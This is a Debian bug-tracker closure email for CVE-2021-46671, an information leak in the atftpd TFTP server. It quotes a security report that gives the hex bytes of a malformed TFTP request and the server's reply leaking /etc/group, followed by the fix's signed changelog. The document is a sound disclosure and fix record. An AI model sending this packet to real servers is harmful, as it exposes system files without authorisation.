Your message dated Sun, 13 Feb 2022 22:03:23 +0000 with message-id <e1njmxn-000ews...@fasolo.debian.org> and subject line Bug#1004974: fixed in atftp 0.7.git20120829-3.2~deb10u3 has caused the Debian Bug report #1004974, regarding atftpd: CVE-2021-46671: Potential information leak in atftpd<0.7.5 to be marked as done.
This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 1004974: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1004974 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems
--- Begin Message ---Package: atftpd Version: 0.7.git20120829-3.3+deb11u1 Severity: grave Tags: security Justification: user security hole X-Debbugs-Cc: debian_f7b...@jkrupp.de, Debian Security Team <t...@security.debian.org> Dear Maintainer, * What led up to the situation? During a research project we have found a potential information leak in the atftpd daemon from package atftpd, where malformed requests can lead to a (partial) leak of the contents of /etc/group. * What exactly did you do (or not do) that was effective (or ineffective)? Sent the following (malformed) packet: ``` 00000000: 0001 006e 6574 6173 6369 6900 7473 697a ...netascii.tsiz 00000010: 6500 78 e.x ``` * What was the outcome of this action? A freshly started atfptd server replies with a packet containing contents of /etc/group ``` 00000000: 0006 7473 697a 6500 7831 3a0a 6269 6e3a ..tsize.x1:.bin: 00000010: 783a 323a 0a73 7973 3a78 3a33 3a0a 6164 x:2:.sys:x:3:.ad 00000020: 6d3a 783a 343a 0a74 7479 3a78 3a35 3a0a m:x:4:.tty:x:5:. 00000030: 6469 736b 3a78 3a36 3a0a 6c70 3a78 3a37 disk:x:6:.lp:x:7 00000040: 3a0a 6d61 696c 3a78 3a38 3a0a 6e65 7773 :.mail:x:8:.news 00000050: 3a78 3a39 3a0a 7575 6370 3a78 3a31 303a :x:9:.uucp:x:10: 00000060: 0a6d 616e 3a78 3a31 323a 0a70 726f 7879 .man:x:12:.proxy 00000070: 3a78 3a31 333a 0a6b 6d65 6d3a 783a 3135 :x:13:.kmem:x:15 00000080: 3a0a 6469 616c 6f75 743a 783a 3230 3a0a :.dialout:x:20:. 00000090: 6661 783a 783a 3231 3a0a 766f 6963 653a fax:x:21:.voice: 000000a0: 783a 3232 3a0a 6364 726f 6d3a 783a 3234 x:22:.cdrom:x:24 000000b0: 3a0a 666c 6f70 7079 3a78 3a32 353a 0a74 :.floppy:x:25:.t 000000c0: 6170 653a 783a 3236 3a0a 7375 646f 3a78 ape:x:26:.sudo:x 000000d0: 3a32 373a 0a61 7564 696f 3a78 3a32 393a :27:.audio:x:29: 000000e0: 0a64 6970 3a78 3a33 303a 0a77 7777 2d64 .dip:x:30:.www-d 000000f0: 6174 613a 783a 3333 3a0a 6261 636b 7570 ata:x:33:.backup 00000100: 3a78 3a33 343a 0a00 :x:34:.. ``` * What outcome did you expect instead? No response or an error message from the server. It appears that this bug has been fixed upstream (commit 9cf799c40738722001552618518279e9f0ef62e5), and the fix is already included in atftpd version 0.7.git20210915-3 in debian testing). Yet we were able to reproduce this behavior on debian stable/bullseye (atftpd version 0.7.git20120829-3.3+deb11u1) and debian oldstable/buster (atftpd version 0.7.git20120829-3.2~deb10u2). Further, the issue appears to only occur when running atftpd in standalone mode (--daemon, not via inetd), and only on the very first request, as the buffer containing /etc/group data is overwritten by the new request. -- System Information: Debian Release: 11.2 APT prefers stable-updates APT policy: (500, 'stable-updates'), (500, 'stable-security'), (500, 'stable') Architecture: amd64 (x86_64) Kernel: Linux 5.10.0-9-amd64 (SMP w/1 CPU thread) Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8), LANGUAGE not set Shell: /bin/sh linked to /usr/bin/dash Init: systemd (via /run/systemd/system) LSM: AppArmor: enabled Versions of packages atftpd depends on: ii debconf [debconf-2.0] 1.5.77 ii libc6 2.31-13+deb11u2 ii libpcre3 2:8.39-13 ii libwrap0 7.6.q-31 ii lsb-base 11.1.0 ii tcpd 7.6.q-31 ii update-inetd 4.51 Versions of packages atftpd recommends: ii rlinetd [inet-superserver] 0.9.3-1 Versions of packages atftpd suggests: ii logrotate 3.18.0-2 -- debconf information: atftpd/mcast_addr: 239.239.239.0-255 atftpd/multicast: true atftpd/logfile: /var/log/atftpd.log atftpd/maxthread: 100 atftpd/tftpd-timeout: 300 atftpd/logtofile: false atftpd/tsize: true atftpd/ttl: 1 atftpd/basedir: /srv/tftp atftpd/blksize: true atftpd/verbosity: 5 (LOG_NOTICE) atftpd/port: 69 atftpd/mcast_port: 1758 atftpd/use_inetd: true atftpd/retry-timeout: 5 atftpd/timeout: true
--- End Message ---
--- Begin Message ---Source: atftp Source-Version: 0.7.git20120829-3.2~deb10u3 Done: Andreas B. Mundt <a...@debian.org> We believe that the bug you reported is fixed in the latest version of atftp, which is due to be installed in the Debian FTP archive. A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to 1004...@bugs.debian.org, and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Andreas B. Mundt <a...@debian.org> (supplier of updated atftp package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@ftp-master.debian.org) -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Format: 1.8 Date: Fri, 04 Feb 2022 18:47:25 +0100 Source: atftp Architecture: source Version: 0.7.git20120829-3.2~deb10u3 Distribution: buster Urgency: medium Maintainer: Ludovic Drolez <ldro...@debian.org> Changed-By: Andreas B. Mundt <a...@debian.org> Closes: 1004974 Changes: atftp (0.7.git20120829-3.2~deb10u3) buster; urgency=medium . * Fix for CVE-2021-46671 (Closes: #1004974) Checksums-Sha1: 911be4d5386038d61120ab61741847453038ade5 1832 atftp_0.7.git20120829-3.2~deb10u3.dsc 1824126b0e89fa3bcb86dc331baa3ae1b5b0b414 39475 atftp_0.7.git20120829-3.2~deb10u3.diff.gz 6d1900ba8262a0eda9383f0e164f869e279b0f03 6501 atftp_0.7.git20120829-3.2~deb10u3_amd64.buildinfo Checksums-Sha256: cdfbf2015da904055ae84306e710da7aeb911abf52b4ed608571b0dd04d408b8 1832 atftp_0.7.git20120829-3.2~deb10u3.dsc 50d892bc97d6d6ac55988bfb7d3fb8b7017bb686cc551deea1a9ee172035ab06 39475 atftp_0.7.git20120829-3.2~deb10u3.diff.gz 31f65ba6c09d6f2d9283141be7d698cb8e11fb93dd24d6b938c9cd8e3e9bcf03 6501 atftp_0.7.git20120829-3.2~deb10u3_amd64.buildinfo Files: 2da0f1b1839182324a1c154d3f8ffa24 1832 net extra atftp_0.7.git20120829-3.2~deb10u3.dsc 5dd07e53cc45fcd31cc291a952e3e26f 39475 net extra atftp_0.7.git20120829-3.2~deb10u3.diff.gz 163b23f0ce93746bbd35400f4ed9c4e0 6501 net extra atftp_0.7.git20120829-3.2~deb10u3_amd64.buildinfo -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEEk4pc7h4pDeJV2ayYsB/qhGF7WG0FAmH+QxsACgkQsB/qhGF7 WG0cvQ//QKAmfPke6QAYnc6g/MAgmTDaX80BebuSTeDbzuxxAy8chatquFjLPy2+ mI6XW7AjpLuWBGoqS0L0Cv5l0UrEUN46NJ+iCUITR6D+hfNLtrlG3QMmJbmxlrYI nwoTt5l6Efi6z1H/8BFEMvaBET/B4y9aYRzoqmnKtt9BEMjpIJlQnN/Y4QaRYKVB SyovoY9xr4HDGOTdMBcFXByPTfmbYHLwdMu5mHOK9nVPNThWMDrehKDLxNO1Ge0y UICBGm5tR9uxF6W7jSowqubVeVCbh8FuarzPZvpII8Ntk4avrBfulgUGx567smt2 w+HSdI9UGbMQnJBn7tLg4ip96bNPmu4A0d684IO9kK+haKwXXNvtACLw9NpDrafS Z7BVfnvQ8RFGU/O0dOKBZkxeqcwQ/pHC+vQpAXc2QGAUz1XCNJuErEAtK5YZSifr h+W+qyu5KnpB6sDStguh7w94wyxWJ5/K3H9tsHeMfITAm/GSDR3QndRR/0siWps8 UxPTBz63SBFVYorYNFLsZE9escTfB+JUkdvIfDh2j0PDVMq78crWTbx8d+ZrmAgT Ed6tc+cQHf+MTxXhsG0rRXd3fu1DI5Mypt1Wzph8jbrPt7E/DHEWtNy6CQx/dfrC Rd0c/KJE6Bcn4NitttwRtapjnO/k+LS9btRNZDktfBg9mjI9aIU= =PHrw -----END PGP SIGNATURE-----
--- End Message ---
